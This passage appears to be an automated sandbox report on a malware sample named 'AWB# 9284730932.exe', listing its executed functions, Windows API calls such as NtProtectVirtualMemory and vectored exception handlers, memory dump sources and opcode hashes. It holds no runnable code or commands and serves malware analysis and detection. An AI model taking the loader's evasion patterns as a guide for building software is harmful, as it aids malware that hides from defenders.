                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckChkstkHresult
                                  • String ID: HENKASTENDE
                                  • API String ID: 1396620058-4238399944
                                  • Opcode ID: 9de0d13f3aa350b21355d2dfd3ce6168c7ea699d8b4ec9d9940e17200f3b3faa
                                  • Instruction ID: dc198b49d9e0e8e80a224ea8bc4b1ff75b061457062e327e0b2a7efa30523f39
                                  • Opcode Fuzzy Hash: 9de0d13f3aa350b21355d2dfd3ce6168c7ea699d8b4ec9d9940e17200f3b3faa
                                  • Instruction Fuzzy Hash: 4DF0FE30940209BFCB00AF51DC09BDE7BB1BF49355F108566F546BB1E1C7B996A09B88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Analysis Process: AWB# 9284730932.exe PID: 6252 Parent PID: 5536 AWB# 9284730932.exeCOMMON

                                  Executed Functions

                                  Function 00563198, Relevance: 4.6, APIs: 3, Instructions: 109nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlAddVectoredExceptionHandler.NTDLL(00000001,Function_0000147A), ref: 005631D5
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,?,?,?,?,00000001,00000000), ref: 005632AC
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 005645E2
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual$ExceptionHandlerVectored
                                  • String ID:
                                  • API String ID: 4193742754-0
                                  • Opcode ID: 7763320fc6e69197d24f231594b43766cccd0bd5eecdfbfe3e38700b97970447
                                  • Instruction ID: 4e337d7f742b258d7d17648d57249a092680746067c75cf6228225349da237e5
                                  • Opcode Fuzzy Hash: 7763320fc6e69197d24f231594b43766cccd0bd5eecdfbfe3e38700b97970447
                                  • Instruction Fuzzy Hash: 0F316674600302AFDB506E24C8ADB8B3BA8FF563A1F614659ED9247292D770C8C5CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00563104, Relevance: 3.1, APIs: 2, Instructions: 75nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateThread.KERNELBASE(000000FE,00000000), ref: 00563155
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 005645E2
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectTerminateThreadVirtual
                                  • String ID:
                                  • API String ID: 1241109510-0
                                  • Opcode ID: 81a3d72cb32ade571294493c794c757ff3232bf49db39a25caf00e1e3fa18142
                                  • Instruction ID: f3a9070eadb527e737842cdf187c7636f9d3ecfdb838f8ea3be99799edc7d70f
                                  • Opcode Fuzzy Hash: 81a3d72cb32ade571294493c794c757ff3232bf49db39a25caf00e1e3fa18142
                                  • Instruction Fuzzy Hash: 9A112970604302AFDF306E14D9A9B963F95FF57366FA14152ED8287295D730C4C2CE12
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056431B, Relevance: 3.1, APIs: 2, Instructions: 52sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(00000005), ref: 005643BB
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: d754ee36b869219a8e5acdfd90e59f5c7e6e9d700c0534fdd413d2f85e8c8ff0
                                  • Instruction ID: a9fb960db0273a003f8bc9ccd95c4d55d271509bcb2911de841b11bbb0a2599c
                                  • Opcode Fuzzy Hash: d754ee36b869219a8e5acdfd90e59f5c7e6e9d700c0534fdd413d2f85e8c8ff0
                                  • Instruction Fuzzy Hash: 2C01D6B4204342EFEB115E20C96DBEA3E65BF14395F624D45EC828B1E2D7A5C8C4CE12
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00569440, Relevance: 1.6, APIs: 1, Instructions: 140filenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: FileInternetRead
                                  • String ID:
                                  • API String ID: 778332206-0
                                  • Opcode ID: 7d1ae0f9e88b4f4b63319775f293bcf610fb220b4ec66222aa07e5b68052d316
                                  • Instruction ID: c0fb24e1d65d1cf89f57f9f23a17afb18a9b781283d061d7b41d18fc99e1cda5
                                  • Opcode Fuzzy Hash: 7d1ae0f9e88b4f4b63319775f293bcf610fb220b4ec66222aa07e5b68052d316
                                  • Instruction Fuzzy Hash: C541F630608202CEEF255D54C5A43F53EAEBF66360FB95A2ACC4387298DB758CC5E642
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056447A, Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 005645E2
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 3471cca488d74809d149868f69700158e13439f06673dd1ef4daf563e20bfd15
                                  • Instruction ID: 27a765c073c844e2147480b94463a0832edfdec9860f1e9138638163342a3394
                                  • Opcode Fuzzy Hash: 3471cca488d74809d149868f69700158e13439f06673dd1ef4daf563e20bfd15
                                  • Instruction Fuzzy Hash: 0C012270500301AFDB206A08D99AB973FD9FF577A2F718152ED4287292D734C4C5CE21
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056318B, Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00563198: RtlAddVectoredExceptionHandler.NTDLL(00000001,Function_0000147A), ref: 005631D5
                                    • Part of subcall function 00563198: NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,?,?,?,?,00000001,00000000), ref: 005632AC
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 005645E2
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual$ExceptionHandlerVectored
                                  • String ID:
                                  • API String ID: 4193742754-0
                                  • Opcode ID: 20cff166502dfc13002de82972635e1e535f4edb23e62b3ff0c0d96236ebe43f
                                  • Instruction ID: dd115475bf31bf6720fb5c3d38d149c16952cbaf82e94a3fc65063b7302a684d
                                  • Opcode Fuzzy Hash: 20cff166502dfc13002de82972635e1e535f4edb23e62b3ff0c0d96236ebe43f
                                  • Instruction Fuzzy Hash: 27014570504302BFDB206E18D99AB973F99FF67762F614152ED8287292D730C4C2CE21
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00564461, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00563198: RtlAddVectoredExceptionHandler.NTDLL(00000001,Function_0000147A), ref: 005631D5
                                    • Part of subcall function 00563198: NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,?,?,?,?,00000001,00000000), ref: 005632AC
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 005645E2
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual$ExceptionHandlerVectored
                                  • String ID:
                                  • API String ID: 4193742754-0
                                  • Opcode ID: daa5951d42d6668b2e48a89f866a319cefe028a51eb7e130ba7f018e5d5d2f28
                                  • Instruction ID: 3445e209c60e0df9a53e13a6c30540d4cfc6d2958a4d5cc0a85989b804729538
                                  • Opcode Fuzzy Hash: daa5951d42d6668b2e48a89f866a319cefe028a51eb7e130ba7f018e5d5d2f28
                                  • Instruction Fuzzy Hash: FE01F570504301BFDB206E58D99AB973F99FF577A2F614542E942872A2D734C4C2CE21
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00564469, Relevance: 1.6, APIs: 1, Instructions: 56nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00563198: RtlAddVectoredExceptionHandler.NTDLL(00000001,Function_0000147A), ref: 005631D5
                                    • Part of subcall function 00563198: NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,?,?,?,?,00000001,00000000), ref: 005632AC
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 005645E2
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual$ExceptionHandlerVectored
                                  • String ID:
                                  • API String ID: 4193742754-0
                                  • Opcode ID: ddc044ae51d34d051900c6a788832ae2aadc08644c9fadff34dd307e064aa936
                                  • Instruction ID: 30298503c91bca15ad424b6808c1b586420ed4e59870a8904dc1d3e5dcb0eb25
                                  • Opcode Fuzzy Hash: ddc044ae51d34d051900c6a788832ae2aadc08644c9fadff34dd307e064aa936
                                  • Instruction Fuzzy Hash: 4D012270504301AFDB20AE18D99AB9A3FA8FF57762F614182E942872A2D730C4C1CE21
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005644B3, Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 005645E2
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: a56457fa92369cf8a34affca33168be6793359e87278e4881d66c33c7dc4f696
                                  • Instruction ID: 26ce190ac498f9ba7bc0f70043a95195f510cd2561eb0e261f2d12cbe3172e7f
                                  • Opcode Fuzzy Hash: a56457fa92369cf8a34affca33168be6793359e87278e4881d66c33c7dc4f696
                                  • Instruction Fuzzy Hash: 71014470900202AFDB702E14D9AAB9B2E99FF53766F714252EC42871D6D734C0C6CE21
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005644EF, Relevance: 1.5, APIs: 1, Instructions: 43nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 005645E2
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 336dcad60b10ad65f69925c19c3db376664b56fe2ed45ec84775fd6f7b20d146
                                  • Instruction ID: 8799e529902839a03a1d27b5bfba4012d35b2f71cbd6d27b9cbff4eaf91d3b34
                                  • Opcode Fuzzy Hash: 336dcad60b10ad65f69925c19c3db376664b56fe2ed45ec84775fd6f7b20d146
                                  • Instruction Fuzzy Hash: 19F046B05002026FDB602A18D9AAB9B2E99FF577A2F708242ED52831D5D734C0C68E21
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00564587, Relevance: 1.5, APIs: 1, Instructions: 27nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 005645E2
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 4ea9f4ebe2a74f105647a2a111b5f223de18efb3782a6eaee74c67cb8e33464f
                                  • Instruction ID: a2372d0a08d59bbb9a0c8a97f73911d6e6dd47953ec8073a4f5ac3719ef10a90
                                  • Opcode Fuzzy Hash: 4ea9f4ebe2a74f105647a2a111b5f223de18efb3782a6eaee74c67cb8e33464f
                                  • Instruction Fuzzy Hash: A4E0D8F15041015FDB100A189C59BD72A9AEF5B7B5B70C315E5A6D71D9D730C0C78614
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005643C6, Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00564444
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: fcbc14ebcebccf8428c4f0f373e63fd38d1fde0c2aa41b5ba15c85c6528b5e94
                                  • Instruction ID: 9b0a212c7eb508c30c137051560936ad30d8837346f497e5f452f7b887203bf2
                                  • Opcode Fuzzy Hash: fcbc14ebcebccf8428c4f0f373e63fd38d1fde0c2aa41b5ba15c85c6528b5e94
                                  • Instruction Fuzzy Hash: D1E0D8B10043409FF7150A24CC4DBAE3A58BF143D6F210945B991870E6C7F8C5C48E51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00568E42, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00568852,?,0056369C,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00568E5E
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368790242.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 30a613868d0bd6329ea1e76ec9f4c24f4be7a63365a4af69ebc7695101bc950d
                                  • Instruction ID: d7d733fb72f2a692c9abc50265fbc0c1a54f3ad8decb9a692466b5017dd0f1dd
                                  • Opcode Fuzzy Hash: 30a613868d0bd6329ea1e76ec9f4c24f4be7a63365a4af69ebc7695101bc950d
                                  • Instruction Fuzzy Hash: 96C012E01140002E74048928CD44C27726AC6D4738B10C31CB871626CCC530DC044031
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3d4143669bf56121ab1058549018bf11846bb2b7bde5e0fcf140fefe55ec85c0
                                  • Instruction ID: 18942b807acc254915c7b78de4a9cac9840f5fe70b254e852201c28d7f370801
                                  • Opcode Fuzzy Hash: 3d4143669bf56121ab1058549018bf11846bb2b7bde5e0fcf140fefe55ec85c0
                                  • Instruction Fuzzy Hash: 33900265601000864140716A884CA0A40057BE16517D2C231E0A88510D859D886576A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6f5aa90c4fde1163df9d3b0cd01729496fd40d5791884164604994c8a34979b9
                                  • Instruction ID: cd2b128d49c6411cd359937003ae9657be47472803a458235b6b77519b4d4330
                                  • Opcode Fuzzy Hash: 6f5aa90c4fde1163df9d3b0cd01729496fd40d5791884164604994c8a34979b9
                                  • Instruction Fuzzy Hash: CF90027520140446D100615A481C70F000557D0742FD2C121E1254515D8669885175B2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 90b9e6b8f08d09ef9db0928ab95fa49aaace9d452eec4e390a8ec9c53589278a
                                  • Instruction ID: d7120df0c0bff832feb751c2d6cf20db8c34a0f26c3637532aecb1b89763b53f
                                  • Opcode Fuzzy Hash: 90b9e6b8f08d09ef9db0928ab95fa49aaace9d452eec4e390a8ec9c53589278a
                                  • Instruction Fuzzy Hash: E890027520100846D180715A440C74E000557D1741FD2C125E0115614DCA598A5977E2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d620945f3e693cf8d05b7a8986f933a5c54ab6b53c7a408285ef10d8ef515b10
                                  • Instruction ID: 3dd0743f8cca69710d495101eb44dbe0d7c3cc4d783647bcdd174005a1f54694
                                  • Opcode Fuzzy Hash: d620945f3e693cf8d05b7a8986f933a5c54ab6b53c7a408285ef10d8ef515b10
                                  • Instruction Fuzzy Hash: 8F90026521180086D200656A4C1CB0B000557D0743FD2C225E0244514CC95988617562
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: cb1c8d2d5fcb3733ec673507c55813644e377effc53bdebf322cf91ba5284f9b
                                  • Instruction ID: ef5b253acdb7bcb6d85f0a1095bd9f4498dfa1aaff230f2d729c8b345bbe54da
                                  • Opcode Fuzzy Hash: cb1c8d2d5fcb3733ec673507c55813644e377effc53bdebf322cf91ba5284f9b
                                  • Instruction Fuzzy Hash: BC90027520108846D110615A840C74E000557D0741FD6C521E4514618D86D988917162
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c0edc678dd3d5412f20d53957556f8b7131a364210a75e2bd36b31d63249d0ff
                                  • Instruction ID: 5fc600a6af3f323a45716e9acb4398a2fcbbb0e08e333fab3749652b2ca3d10d
                                  • Opcode Fuzzy Hash: c0edc678dd3d5412f20d53957556f8b7131a364210a75e2bd36b31d63249d0ff
                                  • Instruction Fuzzy Hash: D690027520100446D100659A540C74A000557E0741FD2D121E5114515EC6A988917172
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3956742ed3e9cbb02a74ed11bd24d824239a098825e83590657b4044ea83299f
                                  • Instruction ID: 25bc4bfb324759299ade31a33d5159a6e8e48ae3f7e15096fe26cf15f60d6853
                                  • Opcode Fuzzy Hash: 3956742ed3e9cbb02a74ed11bd24d824239a098825e83590657b4044ea83299f
                                  • Instruction Fuzzy Hash: 5B90026530100047D140715A541C70A4005A7E1741FD2D121E0504514CD95988567263
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d16f4fb0795ce0abd0189d26f387d24d5149582027f8353b3ac1fdf1dde9752c
                                  • Instruction ID: 7218c6ae9a9795bd688dc2b845c83eaf637acedee432c69d384e3f0db6ef6955
                                  • Opcode Fuzzy Hash: d16f4fb0795ce0abd0189d26f387d24d5149582027f8353b3ac1fdf1dde9752c
                                  • Instruction Fuzzy Hash: A590026D21300046D180715A540C70E000557D1642FD2D525E0105518CC95988697362
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9ea5c7306628ce1d6058e4ddc637eb67d249358dbfd2a1a8833a820a90bb82e1
                                  • Instruction ID: d22d96c8685158c6026a1d134419228c9a8dfbdc279ce50e2382c8d051fda9eb
                                  • Opcode Fuzzy Hash: 9ea5c7306628ce1d6058e4ddc637eb67d249358dbfd2a1a8833a820a90bb82e1
                                  • Instruction Fuzzy Hash: 7490027520100457D111615A450C70B000957D0681FD2C522E0514518D969A8952B162
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 69e20f55a7cee8b65ebd4758792e5615dea4655f1a47a69fcd8b631bdc609159
                                  • Instruction ID: 43be0823cd91e2b2ff088d531b3c57b0027198cb802e625b1c6a8a73bb32927a
                                  • Opcode Fuzzy Hash: 69e20f55a7cee8b65ebd4758792e5615dea4655f1a47a69fcd8b631bdc609159
                                  • Instruction Fuzzy Hash: AC900265242041965545B15A440C60B400667E06817D2C122E1504910C856A9856F662
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1326f8abf98fbe46a941b67f064e7e3e2f74c9e0559b3bfcbb0fbcb1c62aa70d
                                  • Instruction ID: 6eeb228c800cb474f21126f290c8bdf9585a85ca8901061fdf0fa7bbe728e60c
                                  • Opcode Fuzzy Hash: 1326f8abf98fbe46a941b67f064e7e3e2f74c9e0559b3bfcbb0fbcb1c62aa70d
                                  • Instruction Fuzzy Hash: D090026560100546D101715A440C71A000A57D0681FD2C132E1114515ECA698992B172
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8b7fe07b8690245136066acd7667b25e5ee4685ba7f8d17408db480af51850b5
                                  • Instruction ID: e848538c7147f08df8a62953956afbeb529c3dc9331f5e3088af2dec7a848549
                                  • Opcode Fuzzy Hash: 8b7fe07b8690245136066acd7667b25e5ee4685ba7f8d17408db480af51850b5
                                  • Instruction Fuzzy Hash: 6E9002B520100446D140715A440C74A000557D0741FD2C121E5154514E869D8DD576A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ed7caeb51d3f096c5f4db7676034fc1b4b44d2d4d003d105f155e246832629e9
                                  • Instruction ID: 3d6bcd29db30a9c90b61d314f917a7bc5ab90e31f4c78ac367c30708842e5934
                                  • Opcode Fuzzy Hash: ed7caeb51d3f096c5f4db7676034fc1b4b44d2d4d003d105f155e246832629e9
                                  • Instruction Fuzzy Hash: 13900269211000470105A55A070C60B004657D57913D2C131F1105510CD66588617162
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f87a3d4879f8736d4111da5a72d221364743103b361ee279bc3e818d2f22df1f
                                  • Instruction ID: f8c79112a0a005290d856babf543b472d98c99dbf692046d7d7bee1e16db80aa
